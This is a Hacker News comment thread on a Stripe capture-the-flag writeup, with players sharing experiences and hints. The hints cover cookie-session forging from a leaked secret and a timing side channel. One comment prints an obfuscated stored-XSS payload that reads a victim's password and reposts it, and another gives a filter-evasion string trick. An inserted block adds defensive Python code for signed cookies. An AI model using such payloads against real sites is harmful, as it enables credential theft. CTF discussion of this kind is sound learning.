Stripe CTF Writeup

126 points by santaragolabs, over 12 years ago

17 comments

obituary_latte, over 12 years ago
First ctf here too. Though some people are claiming people were posting answers to irc, I didn't see that happen once. Though, I didn't start lurking until I got stuck on level 5.

What I did see was an awesome group of folks willing to help nudge others in the right direction. Many folks would stick around in prior level channels once they solved the level and offer pointers as to what to look for and where to look for it. Awesome.

I convinced myself it wasn't "cheating" because a) I'm a total noob, and b) sometimes pentesting happens with a team where people bounce ideas off one another.

I spent probably 20 hours trying to finish level 8, and even though I didn't end up getting it, this was a great experience. I'm fully inspired to get better at python and actually ctf next time.

Also, again, awesome how cool the people in irc were.
lmz, over 12 years ago
For levels 4, 5, 6, the Sinatra configuration used client-side cookies for session and the session secret is exposed in the error page. Crashing the app and injecting custom values into the session cookie was how I got through all 3 of them. I did feel like I'm missing the point of the challenge somehow.
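lmz's point above (a session secret shown on an error page lets anyone mint a valid cookie) in a small Python model of a Rack-style signed cookie session. This is an added example, not code from the thread or from Stripe, and the exact serialisation is an assumption; it shows that the verifier can only reject edits made without the secret, and that rotating a leaked secret invalidates every outstanding cookie.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Assumed model of a Rack 1.x-style cookie session as used by Sinatra:
#   cookie = base64(payload) + "--" + hex(HMAC-SHA1(secret, base64(payload)))
# JSON stands in for Rack's Marshal serialisation; the signing layout is the point.

def sign_session(secret: str, session: dict) -> str:
    data = base64.b64encode(json.dumps(session, sort_keys=True).encode()).decode()
    mac = hmac.new(secret.encode(), data.encode(), hashlib.sha1).hexdigest()
    return f"{data}--{mac}"

def load_session(secret: str, cookie: str) -> Optional[dict]:
    """Return the session dict, or None when the cookie's HMAC does not verify."""
    data, sep, mac = cookie.rpartition("--")
    if not sep:
        return None
    expected = hmac.new(secret.encode(), data.encode(), hashlib.sha1).hexdigest()
    # Constant-time compare so the verifier itself is not a timing side channel.
    if not hmac.compare_digest(expected.encode(), mac.encode()):
        return None
    return json.loads(base64.b64decode(data))

def edit_payload_keep_mac(cookie: str, **changes) -> str:
    """Negative test: rewrite the payload but keep the old MAC, i.e. what is possible
    without the secret. load_session must reject the result."""
    data, _, mac = cookie.rpartition("--")
    session = json.loads(base64.b64decode(data))
    session.update(changes)
    edited = base64.b64encode(json.dumps(session, sort_keys=True).encode()).decode()
    return f"{edited}--{mac}"
```

Whoever holds the secret can call sign_session just like the application does, which is why a secret that appears in a stack trace or error page has to be treated as compromised and rotated, not merely hidden.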
aerique, over 12 years ago
First time I took part in one of these challenges and I enjoyed it a lot. I made it only up to level 3 and seeing comments of others at higher levels saying it was easy, wasn't very good for my self-confidence :-) However, I can only assume they had some prior experience in this field and / or had an IQ of 150 (http://abiusx.com/stripe-ctf-2-web-challenges/).

After having spent more than a day on level 3 I decided to look on-line for solutions and came across the aforementioned website. I was happy to see my attempt was pretty close but looking at the rest of the levels it was obvious I was out of my depth and gave up (it was already Tuesday anyway).

These write-ups are nice (although abiusx' ought to have been posted only after the challenge was finished) to see how others have solved the levels in different ways.

I can't wait for the next challenge from Stripe and will definitely check out some others on-line. It's like puzzles for grown men.
e12e, over 12 years ago
Great, I've been waiting for this. Now I can finally get past level 2 -- I didn't realize a non-existent file would work, even though I did figure you could overwrite variables due to the get. I considered overwriting filename with "index.php" and figuring out what attempt would have to be to pass -- but that was too much work for a simple challenge when I had enough other stuff to do ;-)

At least I identified the "correct" vulnerability.
brown9-2, over 12 years ago
I learned another interesting way to create strings in JavaScript without using a quote character:

    var s = /string you want/.source;
saurik, over 12 years ago
As various people are commenting on #8: modern server operating systems do not do this behavior "by default". The hints from Stripe were all "run it and it will be obvious", but while the exploit worked fine on my laptop, I went to the trouble of duplicating the setup they had as exactly as I could, setting up the same version of Ubuntu they were using in the same EC2 region (which then implies the same version of Twisted: 10.0.0, despite their being adamant about 11.1.0, which I figured might even be the problem), and it didn't actually do that: reasonable server systems are configured, out of the box, to randomize that side channel. I personally believe that this is part of why there was such a cliff when everyone hit level #8 with regards to difficulty in solving.
sly010, over 12 years ago
An important aspect to #8 was the 250ms lock, that allowed you to send multiple requests while others were locked out. First I was trying to send the requests from my local machine, which made it nearly impossible to get usable numbers because of the delay in the network.

Before I started using the level2 machine to both send and receive, I was planning to bind on every port of the level2 server to stop/slow others thus raising my own chances of hit. Luckily it didn't come to that.

Even before the port number attack, I was trying to find a pattern in the request object pointer values in subsequent backtraces. This gave me the port idea.

Also spent a few hours trying to exploit the Twisted HTTP client by malformed HTTP redirects (taking the over-specified Twisted version in the README as a clue).
tvdw, over 12 years ago
Finished as 30th, when we still had to actually work to get the answers (shortly after that everyone just started posting the answers in the IRC channels). Level 8 was a really nice challenge. After completing the challenge I managed to optimize my level 8 solution a lot, so much that it managed to finish in under 3 minutes by only doing roughly 2400 API calls (2000 for the bruteforcing itself, 400 to compensate for other players).

https://gist.github.com/38c0430b5084f8442858 for those who are interested. There aren't many comments in there though.
chucknelson, over 12 years ago
I only made it to level 5, but I see that the later levels would have stopped me in my tracks anyway! I'm curious to see other solutions, especially for level 8. Was brute-forcing with a script really the only way?
vhf, over 12 years ago
For those like me who enjoyed level8 so much and want to see how their strategy compares to others', go to http://level8-scores.danopia.net/

These two awesome guys (early capturers) rewrote the level8 server, set up a level2-like server, and created an IRC bot that lets you run your code (after requesting SSH access to the level2-bonus server) against others in a speedrun on a random flag (same flag for every participant in a round).

Best capture time and lowest request count wins. It's quite a lot of fun, check it out.
fijter, over 12 years ago
Very similar to the methods I used :)

On level 5 I used a textfile on the compromised level 2 server instead of the 'cleaner' method shown here.

On level 6 I used some more JS:

    }];</script><script type=text/html id=payload>$.get(*/user-hfbnljhhim/user_info*).done(function(data) { var pwd = escape($(data).find(*table tr td:last*).text()); $(*#title*).val(*pwd*); $(*#content*).val(pwd); $(*form*).unbind(*submit*); $(*form*).trigger(*submit*); } )</script><script type=text/javascript>$(function() {eval(String.fromCharCode(118,97,114,32,112,97,121,108,111,97,100,32,61,32,39,35,112,97,121,108,111,97,100,39)); eval($(payload).text().replace(/[*]/g, String.fromCharCode(39))); var post_data = [{}];});</script><script> var t = [{

It's funny to see how similar the python script is in level 8 with what I wrote, would be cool to see more writeups on this one with different solutions :)
fduran, over 12 years ago
Arrg! So close https://stripe-ctf.com/progress/fduran if only I had started earlier.

For the last level I solved it locally but in the server I didn't get the '3' port difference for the first password chunk (at least in the first rounds) so I made it more complicated by getting as candidates the small port differences and running those again and culling again, got the 1st chunk of my flag before running out of time... oh well.

Stripe people made an excellent job, I really enjoyed the challenge. They were blogging that the setup took only a couple of man-weeks, given the success of this CTF I think there may be a start-up idea here: to use similar challenges for programming and/or security training/job interviews.

I'll take someone who solved by himself/herself this ctf over a CISSP in most situations any time (I'm a CISSP myself).
showdead, over 12 years ago
I got to level 6 before I quit. I'm certain I could complete it but I could not justify spending any more time on it.

In contrast to their previous ctf, this time the contest itself seemed less technically robust. The site didn't work in a browser without javascript support (elinks). On level 6, the "social network" app did not work with the (quite old) version of Chrome I have; Opera could post a single message after loading the page, but after that it would silently fail to post any further messages.

I still have the shirt from the previous ctf. Dealing with disassembly was a lot more enjoyable than trying to learn jquery.
Bootvis, over 12 years ago
This was the first time I seriously tried to do a CtF and it was surprisingly fun. I spent almost the entire weekend working on it and was surprised by my eventual success despite needing some help. I'm pretty sure I would have given up on level 7 if I hadn't seen the paper on the Flickr API. This insight will actually make my code better.

Thanks to the Stripe Team for the challenge and the T-shirt :)
basseq, over 12 years ago
I got through level 6 on my own. Level 7 requires an understanding of crypto, which to me isn't a web vulnerability per se. I eventually broke it with the hint that the vulnerability was a hash length extension attack, but I never would have thought of that on my own. Level 8 seemed really involved, and I threw in the towel. :)
pppggg, over 12 years ago
This was a lot of fun while it lasted. We should do it more often. Are you guys up for a community driven CTF on a regular basis? It could be a lot of fun. We could create a pot where everybody can contribute towards the prize.
amanvir, over 12 years ago
The last task was *really* obscure, must have taken a while to figure that one out